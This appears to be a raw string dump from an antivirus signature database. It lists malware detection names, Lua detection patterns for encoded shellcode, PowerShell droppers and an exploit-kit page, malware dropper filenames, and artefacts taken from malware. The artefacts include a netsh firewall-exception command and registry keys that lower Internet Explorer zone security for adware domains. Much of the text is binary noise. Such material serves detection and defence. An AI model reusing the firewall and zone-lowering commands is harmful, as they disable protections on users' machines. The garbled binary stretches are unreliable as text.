'u!#ALF:Trojan:Win32/Cassini_b6efd62c!ibt !#ALF:TrojanDownloader:Win32/Vadokrist.A (t!#ALF:TrojanDownloader:Win32/Vadokrist.A !#SLF:AGGR:CopyRenamed!notmyfaultc64.exe (t!#SLF:AGGR:CopyRenamed!notmyfaultc64.exe !#SLF:AGGR:CopyRenamed!vsjitdebugger.exe (t!#SLF:AGGR:CopyRenamed!vsjitdebugger.exe !#SLF:TrojanDownloader:Win32/Dridexdll.B (t!#SLF:TrojanDownloader:Win32/Dridexdll.B !#TEL:TrojanDownloader:O97M/Gozi.AGZ!eml (t!#TEL:TrojanDownloader:O97M/Gozi.AGZ!eml !#ALF:Ransom:PowerShell/TestEncrypt.A!MTB )s!#ALF:Ransom:PowerShell/TestEncrypt.A!MTB !#SLF:Context/SuspFileDropBySystemProc.C!sysdir /m!#SLF:Context/SuspFileDropBySystemProc.C!sysdir !#TEL:Trojan:JS/WmiCreateRemotePowershell.C!ams /m!#TEL:Trojan:JS/WmiCreateRemotePowershell.C!ams !#AGG:JS/Obfuscator.Spltra.A }!#ALF:Trojan:Win32/Cassini.A!ibt }!#ALF:Trojan:Win32/Cassini.B!ibt !#TEL:TrojanDropper:VBS/Ursnif.PAC!ams &w!#TEL:TrojanDropper:VBS/Ursnif.PAC!ams !#SLF:Context/FileADSinBasePath.A!sysdir (u!#SLF:Context/FileADSinBasePath.A!sysdir !#TEL:Trojan:PowerShell/PSSchTaskAbuse.A (u!#TEL:Trojan:PowerShell/PSSchTaskAbuse.A *s!#AGGR:PowerShell/PSExploitDynamicAssembly !#SLF:EmailContextOfficeWithObjectFile.A!js +r!#SLF:EmailContextOfficeWithObjectFile.A!js !#BLKACC:92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -p!#BLKACC:92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b !#SLF:VirTool:PowerShell/SuspAdminAccess.A!MTB .o!#SLF:VirTool:PowerShell/SuspAdminAccess.A!MTB !#ExcelSiorType.C !#ALF:HtaExecFromDwn.B !#BM_AT:AADprovisioningapi !#SLF:AGGR:CopyRenamed!psr.exe !#TEL:Trojan:Win32/Linkommer.A !#ALF:Trojan:HTML/Phish.PBT!MTB !#ALF:Trojan:O97M/Phish.PDD!MTB !#ALF:Trojan:O97M/Phish.PDX!MTB !#ALF:Phish:PHP/MS_Login_PKT!MTB ~!#ALF:Phish:PHP/MS_Login_PKT!MTB ~!#ALF:Trojan:Win32/Cassini.A!ibt ~!#ALF:Trojan:Win32/Cassini.B!ibt !#SLF:AGGR:CopyRenamed!dfsvc.exe ~!#SLF:AGGR:CopyRenamed!dfsvc.exe !#TEL:SuspSpoolsvProcessDrop.A!exe \"|!#TEL:SuspSpoolsvProcessDrop.A!exe !#SLF:HackTool:PowerShell/Azhunting #{!#SLF:HackTool:PowerShell/Azhunting !#AGG:SWF/Obfuscator.NeutrinoEKLike.F %y!#AGG:SWF/Obfuscator.NeutrinoEKLike.F !#do_exhaustivehstr_rescan_nivdort_bz %y!#do_exhaustivehstr_rescan_nivdort_bz !#ALF:Trojan:Win32/Cassini_2d3c98bf!ibt 'w!#ALF:Trojan:Win32/Cassini_2d3c98bf!ibt !#ALF:VirTool:Powershell/GropPass.B!MTB 'w!#ALF:VirTool:Powershell/GropPass.B!MTB !#ALF:VirTool:Powershell/LockWats.B!MTB 'w!#ALF:VirTool:Powershell/LockWats.B!MTB !#BM_CopyRenamedIName_logonsessions64.exe )u!#BM_CopyRenamedIName_logonsessions64.exe !#BM_CopyRenamedIName_runscripthelper.exe )u!#BM_CopyRenamedIName_runscripthelper.exe !#BM_CopyRenamedOName_logonsessions64.exe )u!#BM_CopyRenamedOName_logonsessions64.exe !#BM_CopyRenamedOName_runscripthelper.exe )u!#BM_CopyRenamedOName_runscripthelper.exe !#ALF:TrojanDownloader:O97M/EncDoc.TOTE!MTB +s!#ALF:TrojanDownloader:O97M/EncDoc.TOTE!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TOTF!MTB +s!#ALF:TrojanDownloader:O97M/EncDoc.TOTF!MTB !#SLF:Context/FileADSinBasePath.A!locallowappdata 1m!#SLF:Context/FileADSinBasePath.A!locallowappdata !#TEL:Trojan:HTML/Wampen.D !#TEL:Exploit:HTML/Meercat.I!dha !#SLF:Exploit:Script/Mucsplat.K!dha #|!#SLF:Exploit:Script/Mucsplat.K!dha !#Lua:Macro:O97M/MacroSaveToFile.A!amsi 'x!#Lua:Macro:O97M/MacroSaveToFile.A!amsi !#ALF:Exploit:ASP/MachineKeyFinder.A!dha (w!#ALF:Exploit:ASP/MachineKeyFinder.A!dha !#ALF:TrojanDownloader:O97M/Qakbot.RVJ!MTB *u!#ALF:TrojanDownloader:O97M/Qakbot.RVJ!MTB !#ALF:HackTool:PowerShell/InvokeBlunt.A!MTB +t!#ALF:HackTool:PowerShell/InvokeBlunt.A!MTB !#SLF:EmailContextOfficeWithObjectFile.B!js +t!#SLF:EmailContextOfficeWithObjectFile.B!js !#SLF:EmailContextOfficeWithObjectFile.A!bat ,s!#SLF:EmailContextOfficeWithObjectFile.A!bat !#SLF:EmailContextOfficeWithObjectFile.A!cmd ,s!#SLF:EmailContextOfficeWithObjectFile.A!cmd !#SLF:EmailContextOfficeWithObjectFile.A!com ,s!#SLF:EmailContextOfficeWithObjectFile.A!com !#SLF:EmailContextOfficeWithObjectFile.A!exe ,s!#SLF:EmailContextOfficeWithObjectFile.A!exe !#SLF:EmailContextOfficeWithObjectFile.A!hta ,s!#SLF:EmailContextOfficeWithObjectFile.A!hta !#SLF:EmailContextOfficeWithObjectFile.A!jar ,s!#SLF:EmailContextOfficeWithObjectFile.A!jar !#SLF:EmailContextOfficeWithObjectFile.A!jse ,s!#SLF:EmailContextOfficeWithObjectFile.A!jse !#SLF:EmailContextOfficeWithObjectFile.A!lnk ,s!#SLF:EmailContextOfficeWithObjectFile.A!lnk !#SLF:EmailContextOfficeWithObjectFile.A!pif ,s!#SLF:EmailContextOfficeWithObjectFile.A!pif !#SLF:EmailContextOfficeWithObjectFile.A!ps1 ,s!#SLF:EmailContextOfficeWithObjectFile.A!ps1 !#SLF:EmailContextOfficeWithObjectFile.A!scr ,s!#SLF:EmailContextOfficeWithObjectFile.A!scr !#SLF:EmailContextOfficeWithObjectFile.A!vbe ,s!#SLF:EmailContextOfficeWithObjectFile.A!vbe !#SLF:EmailContextOfficeWithObjectFile.A!vbs ,s!#SLF:EmailContextOfficeWithObjectFile.A!vbs !#SLF:EmailContextOfficeWithObjectFile.A!wsf ,s!#SLF:EmailContextOfficeWithObjectFile.A!wsf !#SLF:EmailContextOfficeWithObjectFile.A!wsh ,s!#SLF:EmailContextOfficeWithObjectFile.A!wsh !#SLF:HackTool:PowerShell/Internaloff.L1!MTB ,s!#SLF:HackTool:PowerShell/Internaloff.L1!MTB !#AGGR:TrojanDownloader:Win32/Upatre!unpacked -r!#AGGR:TrojanDownloader:Win32/Upatre!unpacked !#ALF:PSExecFromDwn.B !#ALF:Virtool:JS/Obfuscator.FH !#PossiblePangimopLanding!Lowfig !#TEL:Backdoor:PHP/Remoteshell.P (z^4 fPM C ^ cNR Lf wJ &By k?6V IB+ 7 !e!j X YOW J$m C T)| s ` xTmv CU^H (( %_@ ) .XK oy @& $ &@u j ; @u Y_^[ Y_^[ d$@f $ $r #@u j ; @u Y_^[ Y_^[ l!@f D,nS _i o3f \t o3f \t oU5 twW / kF;r & d{= jd@. f |_? 04 9 c7'? c7'? P SL<? SL<? + b< SW Ey> bd\"j gP'9 gP'9 f OQM? k~r? > > u{? ?~? ?%8> U? ST _aL? K ? E E9> ( B @BE (EF@ 'c'c X z%:p K gWE cbqi ; 2 p &G \"p `LL ( iL Lxz# = r25m at~( c P the \t\t\t\t \t\t\t\t \t 2 \t \t\t\t \t\t \t \t\t\t\t \t\t\t \t \t\t\t\t \t\t\t\t \t \t \t\t \t\t\t \t \t\t\t \t\t\t \t \t\t\t\t \t\t \t \t \t\t \t\t \t\t\t\t \t\t \t\t \t\t\t\t \t\t \t \t\t \t\t\t \t\t \t \t \t 7?I N 0nJ -S[ Z^ p: L*AU Us !{$ ' ,t uQ [F xkj I` @ Q b#z v1J yD 7{ 44 0# X( Y+HZ HPNR l T0bt G\\>! a N=13 Yc ,7 g wSC x( /c ? *+<L j\\$ z\"7 6 C|. c $O *0#= :FNQ OuE :4*_ 7Y9Rv= d_ Ek _<kGDUdS Rn,C` Me+gr bG `9T *;eSs B~ivS ZPoP\t uyRAG Software\\Classes\\BHOmod.BHOmodObj !Software\\Classes\\BHOmod.BHOmodObjc' !Software\\Classes\\BHOmod.BHOmodObjc) Software\\Classes\\BHOmod.BHOmodObj.1 #Software\\Classes\\BHOmod.BHOmodObj.1c) #Software\\Classes\\BHOmod.BHOmodObj.1cY SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\\\systray.exbr SSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\\\systray.exbrcY SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\\\systray.exys SSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\\\systray.exysct SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskScheduler\\\\{4f141cba-1457-6cca-03a7-7aa21b61ea0f} nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskScheduler\\\\{4f141cba-1457-6cca-03a7-7aa21b61ea0f}] MonitoringTool:Win32/ThePCDetective #MonitoringTool:Win32/ThePCDetective \\the pc detective\\ems.exeq &\\the pc detective\\ems.exeq \\the pc detective\\tpcl.exeq &\\the pc detective\\tpcl.exeq \\the pc detective\\viewer.exe] &\\the pc detective\\viewer.exe] !msshed32 <pIpJ !eetu Bmg8g 1[O=8 4K DW{\thY 4K DW{\thY: \\eetu.exe] !News12 kpfOSrY fOSrg BrowserModifier:Win32/ToolbarPartner $BrowserModifier:Win32/ToolbarPartner !DRUsearch SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{10000000-1000-0000-1000-000000000000} \\internet explorer\\cvpdvmcu.exe] `SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{10000000-1000-0000-1000-000000000000}q!&\\internet explorer\\cvpdvmcu.exe] !Vxgame @$ ,`z@ ,+ @Y L^ug& L^ug&/ usbgg5bmm 0bempbe/qiq iuuq;00 netsh firewall set allowedprogram '%s' enable -netsh firewall set allowedprogram '%s' enable /cj{uy traff4all.biz c:SeDebugPrivilege vxv.php cntr.php svcp.csv %s\\vx e%s\\vx tibs. proxy. zgame1.exe kernels8.exe notoutpost hide_ un_hide_ _un_hide _unhide GetSystemDefaultLangID ObtainUserAgentString NtQueryDirectoryFile NtEnumerateValueKey %c%c%c%ccX software\\microsoft\\windows\\currentversion\\internet settings\\\\minlevel code downloadc[ Esoftware\\microsoft\\windows\\currentversion\\internet settings\\\\minlevel software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\ranges\\range1\\\\* Tsoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\ranges\\range1\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\slotch.com\\\\* Ysoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\slotch.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\ysbweb.com\\\\* Ysoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\ysbweb.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\\\trust warning level Psoftware\\microsoft\\windows\\currentversion\\internet settings\\\\trust warning level no securitycc Software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\porn-host.org\\\\* \\Software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\porn-host.org\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\skoobidoo.com\\\\* \\software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\skoobidoo.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\slotchbar.com\\\\* \\software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\slotchbar.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\\\safety warning level succeedsilentcd Qsoftware\\microsoft\\windows\\currentversion\\internet settings\\\\safety warning level software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\flingstone.com\\\\* ]software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\flingstone.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\xxxtoolbar.com\\\\* ]software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\xxxtoolbar.com\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\clickspring.net\\\\* ^software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\clickspring.net\\\\* software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\mt-download.co ^software\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\mt-download.co Uo#aCJ k}L$of 2?Dim qjaFg IG\\o) ,m::/U \\p\\H]p !#ALF:HeraklezEval:TrojanDownloader:O97M/ZLoader.ARJ!rfn +8!#ALF:HeraklezEval:TrojanDownloader:O97M/ZLoader.ARJ!rfnbB rRyX1P5 ZOD\t (z ZOD\t% ZOD\t,yL ZOD\t5 ZOD\t; ZOD\tGo ZOD\tKT7: ZOD\t[ ZOD\tb ZOD\ti ZOD\t~ %tB ? (ce|< ]p\\>^p !#ALF:HeraklezEval:Trojan:Win32/AgentCrypt!rfn +.!#ALF:HeraklezEval:Trojan:Win32/AgentCrypt!rfn&S .3)R\"? };&9' _patch_va !#LUA:PowershellDropsNewPE.A !#LUA:PowershellDropsNewPE.AIncludesPHelpersObMpAttributes LUA:PowershellDropsNewPEInAppDataPath.A (LUA:PowershellDropsNewPEInAppDataPath.A IsChainNPath Lua:OfcUsrTruDocRecPsNewPeDrop Lua:EmailClientChainPsNewPeDrop Lua:EmailClientChainPsNewPeDrop Lua:WebMailChainPsNewPeDrop !#Lua:PowerShell.ShellXor.S001 !#Lua:PowerShell.ShellXor.S001ObMpAttributes (cg0kdqon) Lua:MultipleReturnAtTailerInB64.S001 %Lua:MultipleReturnAtTailerInB64.S001 ([A-Za-z0-9+/=]+) %[byte%[%]%] Lua:ShellBytesInB64.S001 0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x, j0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x,0x%x%x, Lua:ShellBytesInB64.S002 Lua:InvokeInB64.S001 !#Lua:FynloskiFilenames msdcsc.exe mdcsc.exe msdcs.exe msdc.exe \tmsdc.exe IMDCSC.exe IMJDC.exe facecall.exe svcost.exe svhost.exe sv_chost.exe svhostss.exe Profoma Invoice.exe Profoma_Invoice.exe monthlyreport.exe ttpayment.scr crypted server.exe DCModule.exe lssass.exe DarkCommet.exe \\.-documents\\.+ \\start menu\\.+ \\administrator\\application data \\administrator\\application data \\appdata\\local \\desktop\\.+ \\windows\\system32\\.+ \\local settings\\application data !\\local settings\\application data \\local settings\\temp !#PEPCODE:Trojan:Win32/Vundo.gen!P.0 SizeOfStackReserve 3a897603c079 [VUNDO_DYNEXE] !#Lua:FakePAVFileName.A guard- Lua:FakePAVFileName.A protect Lua:FakePAVFileName.B safe- Lua:FakePAVFileName.C Lua:FakePAVFileName.D file.exe \tfile.exe Lua:FakePAVFileName.E !#Lua:CeeInject_MyAppChecking !#Lua:CeeInject_MyAppCheckingObMpAttributes !#ceeinject.dz [CeeInject.gen!DZ] Misfox RemoveMisfoxASEPs RemovePayloadFromRegistry Win32/Misfox PowerShell/Misfox %(%[text%.encoding%]::ascii%.getstring%(%[convert%]::frombase64string%(%(gp.*(hk%w%w:\\\\?software\\\\?classes\\\\?%w%w%w%w+).*%.(%w%w%w%w+)%) 25b3098c1150 is_in \\appdata\\local\\apps\\2%.0\\ \\programs\\onesystem\\spider\\ \\gphdesktopapp\\gphdesktopapp\\globalproductivityhub%.exe 8\\gphdesktopapp\\gphdesktopapp\\globalproductivityhub%.exe \\cubase\\cubase_updater%.exe \\myzone\\software\\myzone2%.exe \\csobpkalk\\csobpkalkulatory%.exe !\\csobpkalk\\csobpkalkulatory%.exe \\nitro pro\\skel\\[%x]+\\nitro_temp_file_cleaner%.exe 3\\nitro pro\\skel\\[%x]+\\nitro_temp_file_cleaner%.exe \\adobe.+\\local\\stubexe\\ \\game\\league of legends%.exe \\win64\\valorant-win64-shipping%.exe $\\win64\\valorant-win64-shipping%.exe \\win64\\fortniteclient-win64-shipping%.exe *\\win64\\fortniteclient-win64-shipping%.exe \\wegame.+\\dnf%.exe \\screenconnect%.windowsclient%.exe #\\screenconnect%.windowsclient%.exe \\robloxplayerlauncher%.exe 25178a5e90e53 SCPT:Cookstone mtprotostate SCPT:CookstoneA telegram \ttelegram mitm_manager \\telegram_testing\\ \\mitm_tools \\wifibox \t\\wifibox \\fake_ap \t\\fake_ap Lua:CookstoneA SCPT:CookstoneB \\packages\\telegram\\ \\core\\telegram_testing\\ Lua:CookstoneB !#Lua:ContextualInstGamarueMs2 \\windows\\system32 CONTEXT_DATA_PROCESSDEVICEPATH 29db392dbce75 41b393e77b73 41b393e77b73IncludesResearchData GetRealPidForScenario powershell%.exe$ cmd%.exe$ IsPidObservedGlobal GetTacticsTableForPid GetTechniquesTableForPid AddPidSpecificTechniqueAndTactic !AddPidSpecificTechniqueAndTactic tt_to_child has_inherited_tt !#Lua:Worm:JS/Bondat!CryptKeywords BaseConversions !#Lua:Worm:JS/Bondat!CryptKeywordsIncludesBaseConversionsObMpAttributes %[([^%[%]]*[%+\\][^%[%]]*)%]%( StrToBaseN constructor fromCharCode parseInt \tparseInt \tFunction \\x(..) %((%d+)%)%.toString%((%d+)%) ([\"%+%s]+) \\(%d+) !#LUA:JenxcusCyberCrypt !#LUA:JenxcusCyberCryptIncludesConversionToBinary_fastHex2BinObMpAttributes \"(.-)\" ^%%[0-9A-Za-z][0-9A-Za-z]%%[0-9A-Za-z][0-9A-Za-z]%%[0-9A-Za-z][0-9A-Za-z] J^%%[0-9A-Za-z][0-9A-Za-z]%%[0-9A-Za-z][0-9A-Za-z]%%[0-9A-Za-z][0-9A-Za-z] SCPT:ReverseBase64 [Jenxcus] Pokavampo PokavampoIncludesGenericRepairHelpers SoftwareBundler:Win32/Pokavampo SoftwareBundler:Win32/Pokavampo %common_appdata% \\Microsoft\\Network\\Dsq\\network *-*-* %program_filesx86% 157b36f5f2a4b \\systemsettings.exe .tmp\\setup.exe \\openwith.exe \\searchprotocolhost.exe \\searchindexer.exe \\chrmstp.exe \\userprofilemanager.exe \\taskhostw.exe 97b31e8a934c !#ChangeEPtoExport no_decription no_tls !#PEPCODE:Win32/Vundo.HK2 hasboundimports !#Lua:Exploit:HTML/NeutrinoEK.K SCRIPT:Exploit:HTML/NeutrinoEK.K!obj %SCRIPT:Exploit:HTML/NeutrinoEK.K!obj (<object .-classid=clsid:d27cdb6e.-</object>) .(<object .-classid=clsid:d27cdb6e.-</object>) <object.- id=(%l+) .-> <object.- name=(%l+) .-> <object.- height=\"(%d+)\".-> <object.- width=\"(%d+).-> (<param .-name=\"movie\".->) value=\"(/%w+/.-)\".-> (<embed .-allowscriptaccess=\"samedomain\".->) -(<embed .-allowscriptaccess=\"samedomain\".->) name=\"(%l+)\".-> id=\"(%l+)\".-> height=\"(%d+)\".-> width=\"(%d+)\".-> src=\"(/%w+/.-)\".-> !#Lua:ShellterTrigger !#Lua:ShellterTriggerObMpAttributes !#Lua:DownloadFileName.B update_ Lua:DalexisDownloadFileName.A Lua:LerspengDownloadFileName.A Silasilsap SilasilsapIncludesGenericRepairHelpers appsetup%.exe p1%.exe p2%.exe p3%.exe p4%.exe p5%.exe p6%.exe p7%.exe p8%.exe p9%.exe p10%.exe \tp10%.exe DeleteRe \"DeleteRe 7B!o 7D;XM/ 7D;XM/ kL`&rP 7DBl:Pj 7DBl:Pj ]t Sv Fxq\"| rStj! 7F r 7IZ1o 7IZ1o 7I{H Si]vug 7O63 7Q</ 7R\tQ K<h91 LttOs 7V8G I>>/1 }eXB~os ]8i\"LC ^BbXe 7[Tx 7\\PHQBx7 7\\PHQBx7 {+^ X e C\"O2 7]@? !Y.lM P`f;A ;Y<I7 3\"5Dn 7dTn QM/,Q^ #vnq; 7fqB B6FOFL ,g'RF 7m%X 7mi!1 7mi!1 A8gyN 7q-=S 7q-=S 7r\tn !X-DO |h }QS^w +a-Em 7zdu 7}H+ E[Go# 1\"wcK (3tDo.i 8`W4 F%+U2 4c@5P iygn: %9 6~ o*{++ D]T| MhO[A U+)bp Z[/ib )jMeJ @:9,)q gn+P=Z rY4gW- 6A1O(` ;npD?2 =d\ta8L o_hJGQ l<BHp `:'GfP| *7Zo% {stu* ^L'> 4#\"^` KI[T5 8/5.r y L$@Kx V.T0| +lv|M Oz\"!o L3=3B (JTI\\V V:1Rq' ]B`~u Ft;C `qtix t0XN| u2kN2 SG3(N 2!WD:^ 6uUTV 2?ZA` )\tcR/ s.a(H _&6#\t 8V% i }QRva 8b#9- F)Ir| h\\N0# B 7 c ~8+j. -n\\ImW+6 if8` /}oKt |(o8) 8V!B6 033W/\"%i01 Vkn|j@ |bWx7 bC'<0 ? !'^ >%8=+2 ?!:;; >%gh$NV= ?\"'(L ?&OT@$ X?$fg 8(> ms zyi> *L|(r> :<;*M? =\"ABP ;>!GI ?$MNV Q[^,9? >\"UY< 3^\t?& aXN?! *r_>\t #_?F> ? Q_' >!jkxR j#?#n CO3x> |(r># o8&?& o8&?&&. ').vD> 7_?F> @ km> qb =& FJqb =& NV;*M? qtl?S? _~!>! G; ?\t G; ?\t%'[ ?%AHC .`1>\" DE.`1>\" _~!> U_~!> X\\oJ.> ?&_bW <&kqmj (T ?# \t;'A? BN+?\" NkA=! $NkA=!%'P ;%14r >\"GRD ? JOBT eJ?&Sg >\tWb? .`1> cd.`1> zyi># /*=!%* ?$/kw lK= > B? J` >\"SU@q ry.>& Z]ry.>&[ i,= qt ?! 7uB > \"4c ?##,_~!> >&/075 =.`1> 00010_9090 !#attrmatch_codepatch_EIP_00000012_31C9 !#attrmatch_codepatch_EIP_00000012_9090M !#attrmatch_codepatch_EIP_00000012_9090j|Z !#attrmatch_codepatch_EIP_00000012_9090k !#attrmatch_codepatch_EIP_00000012_9090 !#attrmatch_codepatch_EIP_00000002_01000000V !#attrmatch_codepatch_EIP_00000002_90909090 !#attrmatch_codepatch_EIP_00000008_01000000 !#attrmatch_codepatch_EIP_0000000B_01000000 !#attrmatch_codepatch_EIP_0000000C_31C09090 !#attrmatch_codepatch_EIP_00000000_9090909090 !#attrmatch_codepatch_EIP_00000009_9090909090 !#attrmatch_codepatch_EIP_00000006_909090909090 !#attrmatch_codepatch_EIP_00000000_31C931DB31C043 !#attrmatch_codepatch_EIP_00000000_8B06909090909090 A3 A3 !#PEBMPAT:Deep_AnalysisQP '!#PEBMPAT:Deep_AnalysisQP !#PEBMPAT:Tracur_packer '!#PEBMPAT:Tracur_packer !#Virus:Win32/Sality.gen!enc` \"!#Virus:Win32/Sality.gen!enc` !#lua_codepatch_kovter_trick \"!#lua_codepatch_kovter_trick !#attrmatch_DTBranch_EIP_0_r1 !!#attrmatch_DTBranch_EIP_0_r1 !#PEBMPAT:Win32/AlureonBrute.L !#PEBMPAT:Win32/AlureonBrute.L !#PEBMPAT:Win32/Obfuscator.IX!AZF !#PEBMPAT:Win32/AlureonBrute.N10 !#PEBMPAT:Win32/AlureonBrute.N11 !#PEBMPAT:Win32/AlureonBrute.N12 !#PEBMPAT:Win32/AlureonBrute.N13 !#PEBMPAT:Win32/AlureonBrute.N14 !#PEBMPAT:Win32/AlureonBrute.N15 !#PEBMPAT:Win32/AlureonBrute.N16 !#PEBMPAT:lua_codepatch_ursnif_64H !#PEBMPAT:lua_codepatch_ursnif_64QRAPSVW !#PEBMPPAT:Trojan:Win32/Anomaly.A3 !#attrmatch_codepatch_EIP_00000001_02 !#attrmatch_codepatch_EIP_00000008_8E !#attrmatch_codepatch_EIP_0000000D_EB =llKt =ntdlt =lKEt =tdllt !#attrmatch_codepatch_EIP_0000000F_EBY !#attrmatch_codepatch_EIP_00000016_00 !#attrmatch_codepatch_EIP_00000016_86 !#attrmatch_codepatch_EIP_0000002E_15i !#attrmatch_codepatch_EIP_00000000_B8FE= !#attrmatch_codepatch_EIP_00000004_29C0 !#attrmatch_codepatch_EIP_00000005_EB0F- !#attrmatch_codepatch_EIP_00000006_9090 !#attrmatch_codepatch_EIP_00000007_9090C ttttt !#attrmatch_codepatch_EIP_0000000A_9090X !#attrmatch_codepatch_EIP_0000000A_9090 !#attrmatch_codepatch_EIP_00000012_9090_^ZY[X` !#attrmatch_codepatch_EIP_00000013_9090h !#attrmatch_codepatch_EIP_00000013_9090j !#attrmatch_codepatch_EIP_00000014_9090h !#attrmatch_codepatch_EIP_0000001E_9090V !#PEBMPAT:Deep_Analysis_Disable_APILimit !#PEBMPAT:VirTool:Win32/Obfuscator.LLasDF !#PEBMPPAT:TrojanDropper:Win32/Cutwail.ASj !#attrmatch_codepatch_EIP_00000001_010000 !#PEBMPPAT:TrojanDownloader:Win32/Small.HU2 !#attrmatch_codepatch_EIP_00000002_00000000 !#attrmatch_codepatch_EIP_00000005_01000000]^E !#attrmatch_codepatch_EIP_00000007_00000000 -log1 !#attrmatch_codepatch_EIP_0000000C_01000000 !#attrmatch_codepatch_EIP_0000000C_33F69090 !#attrmatch_codepatch_EIP_0000000C_6631ED90 !#attrmatch_codepatch_EIP_00000000_90909033C0= !#attrmatch_codepatch_EIP_0000000E_8609000000 !#attrmatch_codepatch_EIP_00000007_909090909090 !#PEBMPAT:Deep_Analysis (!#PEBMPAT:Deep_Analysis !#PEBMPAT:InjectorLoop1 (!#PEBMPAT:InjectorLoop1 !#PEBMPAT:Disable_API_LimitU $!#PEBMPAT:Disable_API_LimitU !#lua_codepatch_gepys_trickSQRVW $!#lua_codepatch_gepys_trickSQRVW !#PEBMPAT:VirTool:Win32/KME.3 \"!#PEBMPAT:VirTool:Win32/KME.3 !#PEBMPAT:VirTool:Win32/KME.5 \"!#PEBMPAT:VirTool:Win32/KME.5 !#attrmatch_DTBranch_EIP_0_r1U \"!#attrmatch_DTBranch_EIP_0_r1U !#attrmatch_DTBranch_EIP_BE_r1H !!#attrmatch_DTBranch_EIP_BE_r1H !#VirTool:Win32/Obfuscator.KS!AA !#PEBMPPAT:Trojan:Win32/Anomaly.A1 ?.rsrt ?rsrct ?.ccpt !#attrmatch_codepatch_EIP_00000003_10+ !#attrmatch_codepatch_EIP_00000003_EB !#attrmatch_codepatch_EIP_00000004_EB !#attrmatch_codepatch_EIP_00000006_FF !#attrmatch_codepatch_EIP_00000008_84 =&0@Z !#attrmatch_codepatch_EIP_00000008_EB !#attrmatch_codepatch_EIP_00000009_EB !#attrmatch_codepatch_EIP_0000000A_90 !#attrmatch_codepatch_EIP_0000000B_00U !#attrmatch_codepatch_EIP_0000000E_EBf= !#attrmatch_codepatch_EIP_0000000e_EBV !#attrmatch_codepatch_EIP_00000014_EB !#attrmatch_codepatch_EIP_00000017_7E !#attrmatch_codepatch_EIP_00000017_EB !#attrmatch_codepatch_EIP_00000006_90E9<Zt !#attrmatch_codepatch_EIP_00000006_EB0E 9Actxt !#attrmatch_codepatch_EIP_0000000C_90903 !#attrmatch_codepatch_EIP_00000010_9090f !#attrmatch_codepatch_EIP_00000012_9090U !#attrmatch_codepatch_EIP_00000014_90901 !#attrmatch_codepatch_EIP_00000014_9090M !#attrmatch_codepatch_EIP_00000014_9090U !#attrmatch_codepatch_EIP_00000014_90E9 !#attrmatch_codepatch_EIP_00000015_0100 !#attrmatch_codepatch_EIP_00000015_90903t$ !#attrmatch_codepatch_EIP_00000015_90903|$ !#attrmatch_codepatch_EIP_00000015_9090| !#attrmatch_codepatch_EIP_00000021_90E9 !#PEBMPAT:VirTool:Win32/Obfuscator.LLasDF_ !#attrmatch_codepatch_EIP_00000000_8BC190 !#attrmatch_codepatch_EIP_00000003_909090 hXMVj Y !#PEBMPAT:ReadsDataDirectoryImportTableSize !#attrmatch_codepatch_EIP_00000001_01000000 !#attrmatch_codepatch_EIP_00000002_01000000` !#attrmatch_codepatch_EIP_00000009_89D09090CB !#attrmatch_codepatch_EIP_00000000_B898999919= !#attrmatch_codepatch_EIP_00000001_BD3C7D400090 51984 !#attrmatch_codepatch_EIP_00000013_909090909090 !#attrmatch_codepatch_EIP_00000000_BA010000009090 0!#do_deep_rescan !#PEBMPAT:Disable_SEH_Limit %!#PEBMPAT:Disable_SEH_Limit !#PEBMPAT:Spyeye_decryption_1[ZX #!#PEBMPAT:Spyeye_decryption_1[ZX #!#attrmatch_DTBranch_EIP_0_r1 !#PEBMPAT:VirTool:Win32/KME.6a \"!#PEBMPAT:VirTool:Win32/KME.6a o.< Q !#VirTool:Win32/Obfuscator.AGP3 \"!#VirTool:Win32/Obfuscator.AGP3 !#VirTool:Win32/Obfuscator.AGPUPV \"!#VirTool:Win32/Obfuscator.AGPUPV !#VirTool:Win32/Obfuscator.AGPj \"!#VirTool:Win32/Obfuscator.AGPjY \"!#VirTool:Win32/Obfuscator.AGPj^ !#PEBMPAT:AntiEmuInstCountLimit 